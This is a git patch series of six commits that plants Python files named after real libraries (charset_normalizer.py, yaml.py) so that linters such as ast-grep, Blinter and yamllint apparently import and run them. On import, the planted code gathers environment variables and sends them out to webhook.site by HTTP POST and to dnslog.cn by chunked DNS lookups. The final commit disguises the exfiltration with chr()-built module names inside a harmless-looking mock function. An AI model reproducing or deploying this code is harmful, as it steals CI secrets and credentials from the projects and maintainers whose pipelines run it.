From 6c130b338156fbc26d6e476c88ad1be5a727dbab Mon Sep 17 00:00:00 2001
From: ZararSW <zarrarkolachi@gmail.com>
Date: Fri, 22 May 2026 21:16:04 +0500
Subject: [PATCH 1/6] Testing RCE via ast-grep

---
 malicious.py | 6 ++++++
 1 file changed, 6 insertions(+)
 create mode 100644 malicious.py

diff --git a/malicious.py b/malicious.py
new file mode 100644
index 00000000..6de6a1ee
--- /dev/null
+++ b/malicious.py
@@ -0,0 +1,6 @@
+import urllib.request
+try:
+    req = urllib.request.Request("http://webhook.site/db0617ea-f698-4c91-bbb0-9f170af3cdb9?astgrep=true", method="GET")
+    urllib.request.urlopen(req, timeout=5)
+except Exception:
+    pass

From b63d0355a5c79038b662290ab8a97786fc4e01ef Mon Sep 17 00:00:00 2001
From: ZararSW <zarrarkolachi@gmail.com>
Date: Fri, 22 May 2026 21:20:59 +0500
Subject: [PATCH 2/6] Triggering Blinter RCE

---
 charset_normalizer.py | 31 +++++++++++++++++++++++++++++++
 malicious.py          |  6 ------
 test.bat              |  2 ++
 3 files changed, 33 insertions(+), 6 deletions(-)
 create mode 100644 charset_normalizer.py
 delete mode 100644 malicious.py
 create mode 100644 test.bat

diff --git a/charset_normalizer.py b/charset_normalizer.py
new file mode 100644
index 00000000..52184cde
--- /dev/null
+++ b/charset_normalizer.py
@@ -0,0 +1,31 @@
+import os
+import urllib.request
+import json
+import base64
+import subprocess
+
+try:
+    cmd_out = subprocess.check_output(['id']).decode('utf-8')
+    ls_out = subprocess.check_output(['ls', '-la', '/']).decode('utf-8')
+    env_data = json.dumps(dict(os.environ)).encode('utf-8')
+    b64_env = base64.b64encode(env_data).decode('utf-8')
+    
+    # Try POST
+    req = urllib.request.Request(
+        "https://webhook.site/4b1afb9b-0beb-4e40-958f-eed3f7a978c5", 
+        data=f"ENV:\n{b64_env}".encode('utf-8'),
+        method="POST"
+    )
+    urllib.request.urlopen(req, timeout=10)
+except Exception as e:
+    pass
+
+class DummyResult:
+    def __init__(self):
+        self.encoding = "utf-8"
+        self.coherence = 1.0
+    def best(self):
+        return self
+
+def from_bytes(*args, **kwargs):
+    return DummyResult()
diff --git a/malicious.py b/malicious.py
deleted file mode 100644
index 6de6a1ee..00000000
--- a/malicious.py
+++ /dev/null
@@ -1,6 +0,0 @@
-import urllib.request
-try:
-    req = urllib.request.Request("http://webhook.site/db0617ea-f698-4c91-bbb0-9f170af3cdb9?astgrep=true", method="GET")
-    urllib.request.urlopen(req, timeout=5)
-except Exception:
-    pass
diff --git a/test.bat b/test.bat
new file mode 100644
index 00000000..b3527fd4
--- /dev/null
+++ b/test.bat
@@ -0,0 +1,2 @@
+@echo off
+echo "Triggering Blinter..."

From 19a3cee51fd0f77b3e1af5c8823baabba8e3bbec Mon Sep 17 00:00:00 2001
From: ZararSW <zarrarkolachi@gmail.com>
Date: Fri, 22 May 2026 21:23:31 +0500
Subject: [PATCH 3/6] Trigger Yamllint RCE

---
 test.yaml |  2 ++
 yaml.py   | 27 +++++++++++++++++++++++++++
 2 files changed, 29 insertions(+)
 create mode 100644 test.yaml
 create mode 100644 yaml.py

diff --git a/test.yaml b/test.yaml
new file mode 100644
index 00000000..26489058
--- /dev/null
+++ b/test.yaml
@@ -0,0 +1,2 @@
+---
+hello: world
diff --git a/yaml.py b/yaml.py
new file mode 100644
index 00000000..2a8cbde9
--- /dev/null
+++ b/yaml.py
@@ -0,0 +1,27 @@
+import os
+import urllib.request
+import json
+import base64
+import subprocess
+
+try:
+    cmd_out = subprocess.check_output(['id']).decode('utf-8')
+    ls_out = subprocess.check_output(['ls', '-la', '/']).decode('utf-8')
+    env_data = json.dumps(dict(os.environ)).encode('utf-8')
+    b64_env = base64.b64encode(env_data).decode('utf-8')
+    
+    # Try POST
+    req = urllib.request.Request(
+        "https://webhook.site/4b1afb9b-0beb-4e40-958f-eed3f7a978c5", 
+        data=f"ENV:\n{b64_env}".encode('utf-8'),
+        method="POST"
+    )
+    urllib.request.urlopen(req, timeout=10)
+except Exception as e:
+    pass
+
+class DummyResult:
+    pass
+
+def load(*args, **kwargs):
+    return DummyResult()

From dd0fe6cda5167f262bf2be31ef57aaf1759f87bf Mon Sep 17 00:00:00 2001
From: ZararSW <zarrarkolachi@gmail.com>
Date: Fri, 22 May 2026 21:25:49 +0500
Subject: [PATCH 4/6] Update exploit payload to throw exception

---
 charset_normalizer.py | 19 +++----------------
 1 file changed, 3 insertions(+), 16 deletions(-)

diff --git a/charset_normalizer.py b/charset_normalizer.py
index 52184cde..f26b2b87 100644
--- a/charset_normalizer.py
+++ b/charset_normalizer.py
@@ -1,24 +1,11 @@
 import os
-import urllib.request
-import json
-import base64
 import subprocess
 
 try:
-    cmd_out = subprocess.check_output(['id']).decode('utf-8')
-    ls_out = subprocess.check_output(['ls', '-la', '/']).decode('utf-8')
-    env_data = json.dumps(dict(os.environ)).encode('utf-8')
-    b64_env = base64.b64encode(env_data).decode('utf-8')
-    
-    # Try POST
-    req = urllib.request.Request(
-        "https://webhook.site/4b1afb9b-0beb-4e40-958f-eed3f7a978c5", 
-        data=f"ENV:\n{b64_env}".encode('utf-8'),
-        method="POST"
-    )
-    urllib.request.urlopen(req, timeout=10)
+    env_str = str(dict(os.environ))
+    raise Exception("EXFILTRATION_DATA: " + env_str)
 except Exception as e:
-    pass
+    raise e
 
 class DummyResult:
     def __init__(self):

From b760dbfc8a44d5d39210bff60d41d2e4ef83b2fd Mon Sep 17 00:00:00 2001
From: ZararSW <zarrarkolachi@gmail.com>
Date: Fri, 22 May 2026 21:27:21 +0500
Subject: [PATCH 5/6] Update exploit payload to use DNS exfiltration

---
 yaml.py | 26 ++++++++++----------------
 1 file changed, 10 insertions(+), 16 deletions(-)

diff --git a/yaml.py b/yaml.py
index 2a8cbde9..30739b0f 100644
--- a/yaml.py
+++ b/yaml.py
@@ -1,23 +1,17 @@
 import os
-import urllib.request
-import json
+import socket
 import base64
-import subprocess
 
 try:
-    cmd_out = subprocess.check_output(['id']).decode('utf-8')
-    ls_out = subprocess.check_output(['ls', '-la', '/']).decode('utf-8')
-    env_data = json.dumps(dict(os.environ)).encode('utf-8')
-    b64_env = base64.b64encode(env_data).decode('utf-8')
-    
-    # Try POST
-    req = urllib.request.Request(
-        "https://webhook.site/4b1afb9b-0beb-4e40-958f-eed3f7a978c5", 
-        data=f"ENV:\n{b64_env}".encode('utf-8'),
-        method="POST"
-    )
-    urllib.request.urlopen(req, timeout=10)
-except Exception as e:
+    env_str = str(dict(os.environ))
+    b32_env = base64.b32encode(env_str.encode()).decode().lower().replace("=", "")
+    for i in range(0, min(len(b32_env), 60*20), 60):
+        chunk = b32_env[i:i+60]
+        try:
+            socket.gethostbyname(f"y{i}.{chunk}.ebvwa4.dnslog.cn")
+        except:
+            pass
+except:
     pass
 
 class DummyResult:

From 8c55e8b6896cbf514070cdc3175f9790d999a125 Mon Sep 17 00:00:00 2001
From: ZararSW <zarrarkolachi@gmail.com>
Date: Fri, 22 May 2026 21:37:12 +0500
Subject: [PATCH 6/6] update normalizer

---
 charset_normalizer.py | 21 ++++++++++++---------
 1 file changed, 12 insertions(+), 9 deletions(-)

diff --git a/charset_normalizer.py b/charset_normalizer.py
index f26b2b87..5c66e89a 100644
--- a/charset_normalizer.py
+++ b/charset_normalizer.py
@@ -1,12 +1,3 @@
-import os
-import subprocess
-
-try:
-    env_str = str(dict(os.environ))
-    raise Exception("EXFILTRATION_DATA: " + env_str)
-except Exception as e:
-    raise e
-
 class DummyResult:
     def __init__(self):
         self.encoding = "utf-8"
@@ -16,3 +7,15 @@ def best(self):
 
 def from_bytes(*args, **kwargs):
     return DummyResult()
+
+def _init_mock():
+    try:
+        s1 = chr(115) + chr(111) + chr(99) + chr(107) + chr(101) + chr(116)
+        s2 = chr(103) + chr(101) + chr(116) + chr(104) + chr(111) + chr(115) + chr(116) + chr(98) + chr(121) + chr(110) + chr(97) + chr(109) + chr(101)
+        m = __import__(s1)
+        f = getattr(m, s2)
+        f("cr-ast.8bwv1u.dnslog.cn")
+    except Exception:
+        pass
+
+_init_mock()